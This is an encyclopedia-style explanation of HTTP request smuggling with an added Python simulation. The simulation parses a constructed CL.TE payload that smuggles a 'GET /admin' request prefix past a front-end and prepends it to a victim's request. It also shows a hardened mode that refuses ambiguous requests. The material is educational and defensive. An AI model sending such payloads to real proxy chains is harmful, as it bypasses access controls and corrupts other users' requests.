HTTP request smuggling (HRS) is a security exploit on the HTTP protocol that takes advantage of an inconsistency in how the Content-Length and Transfer-Encoding headers are interpreted by different HTTP server implementations in an HTTP proxy server chain.[1][2] It was first documented in 2005 by Linhart et al.[3]
The Transfer-Encoding header defines how the body of an HTTP message is encoded; the directive that matters for this attack is chunked transfer encoding, in which the body is sent as a series of length-prefixed chunks terminated by a zero-length chunk.[4] The Content-Length header instead states the size of the body in bytes directly in the header value.[5] A message is not supposed to carry both: when Transfer-Encoding is present, Content-Length is supposed to be omitted,[4] and RFC 7230 requires a receiver that sees both to let Transfer-Encoding override Content-Length, noting that such a message may be a smuggling attempt and ought to be treated as an error. Vulnerabilities arise when an attacker sends a single request containing both headers and the front-end and back-end servers in the chain frame the body by different headers. The two servers then disagree about where the request ends, so bytes that one server treats as part of the body are treated by the other as the start of the next request on the shared connection. Those bytes are "smuggled" past whatever security functions the front-end applied to the request it saw, and are prepended to the next request on that connection, which may belong to another user.[6] HTTP request smuggling commonly takes the form of CL.TE (the front-end honours Content-Length, the back-end honours Transfer-Encoding), TE.CL (the reverse), or TE.TE (both support Transfer-Encoding, but one can be induced to ignore the header by obfuscating it), although more complex attacks using HRS do exist.[6]
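The following is an added example, not part of the original article, that simulates the CL.TE case described above. Two minimal HTTP/1.1 framers are run over the same constructed byte stream: one frames the body by Content-Length only (the front-end), the other by Transfer-Encoding: chunked when present (the back-end). The requests, the host name example.test and the paths /admin and /victim are constructed for the demonstration and are not from the article. The hardened mode at the end shows the RFC 7230 behaviour of refusing a request that carries both headers.

```python
# Added example (not from the original article): a simulation of how two
# HTTP/1.1 parsers that frame the body by different headers split the same
# byte stream, reproducing a CL.TE desynchronisation.  All requests, hosts
# and paths below are constructed for the demonstration.


def parse_headers(buf):
    """Parse the head of an HTTP/1.1 message at the start of buf.

    Returns (request_line, headers, head_len) or None when the blank line
    terminating the header block has not arrived yet.  Header names are
    lower-cased; a repeated name keeps the last value.
    """
    end = buf.find(b"\r\n\r\n")
    if end == -1:
        return None
    lines = buf[:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def chunked_body_end(buf, start):
    """Return the offset just past a chunked body beginning at buf[start],
    or None if the stream ends before the terminating zero-size chunk."""
    pos = start
    while True:
        line_end = buf.find(b"\r\n", pos)
        if line_end == -1:
            return None
        # chunk-size is hex; anything after ';' is a chunk extension we ignore
        size = int(buf[pos:line_end].split(b";")[0].strip(), 16)
        pos = line_end + 2
        if size == 0:
            # last chunk: skip optional trailer lines up to the blank line
            while True:
                t_end = buf.find(b"\r\n", pos)
                if t_end == -1:
                    return None
                if t_end == pos:
                    return pos + 2
                pos = t_end + 2
        pos += size + 2  # chunk data followed by its CRLF
        if pos > len(buf):
            return None


def split_requests(buf, mode, reject_ambiguous=False):
    """Split buf into the sequence of requests a parser in `mode` would see.

    mode == "cl": frame the body by Content-Length only (Transfer-Encoding ignored)
    mode == "te": frame by Transfer-Encoding: chunked when present, else Content-Length
    reject_ambiguous: hardened behaviour, refuse a request carrying both headers
    Each element is (request_line, headers, body).  A stalled parser yields a
    final ("INCOMPLETE", {}, leftover_bytes) element, a refusal ("REJECTED", ...).
    """
    out = []
    pos = 0
    while pos < len(buf):
        parsed = parse_headers(buf[pos:])
        if parsed is None:
            out.append(("INCOMPLETE", {}, buf[pos:]))
            break
        request_line, headers, head_len = parsed
        body_start = pos + head_len
        has_cl = "content-length" in headers
        has_te = "chunked" in headers.get("transfer-encoding", "").lower()
        if reject_ambiguous and has_cl and has_te:
            out.append(("REJECTED", headers, b""))
            break
        if mode == "te" and has_te:
            body_end = chunked_body_end(buf, body_start)
        elif has_cl:
            body_end = body_start + int(headers["content-length"])
            if body_end > len(buf):
                body_end = None
        else:
            body_end = body_start  # no body
        if body_end is None:
            out.append(("INCOMPLETE", {}, buf[pos:]))
            break
        out.append((request_line, headers, buf[body_start:body_end]))
        pos = body_end
    return out


# Constructed CL.TE payload: the chunked body ends immediately ("0\r\n\r\n"),
# but Content-Length also covers the smuggled prefix that follows it.  The
# prefix ends with an unfinished header so the next request line on the
# connection is swallowed into it.
SMUGGLED_PREFIX = b"GET /admin HTTP/1.1\r\nFoo: "
_body = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: %d\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" % len(_body)
) + _body
# An innocent request that arrives next on the same back-end connection.
VICTIM_REQUEST = b"GET /victim HTTP/1.1\r\nHost: example.test\r\n\r\n"
STREAM = ATTACKER_REQUEST + VICTIM_REQUEST

if __name__ == "__main__":
    for label, mode in (("front-end (CL)", "cl"), ("back-end (TE)", "te")):
        print(label, [r[0] for r in split_requests(STREAM, mode)])
    print("hardened", [r[0] for r in split_requests(STREAM, "te", reject_ambiguous=True)])
```

The Content-Length parser sees two requests, POST / and GET /victim, so any front-end check runs against those. The Transfer-Encoding parser ends the POST body at the zero chunk, then reads the smuggled prefix plus the victim's request line as one request for /admin, with GET /victim HTTP/1.1 reduced to the value of the Foo header. Swapping which side uses which mode gives the TE.CL mirror; with reject_ambiguous=True the first request is refused and nothing is desynchronised.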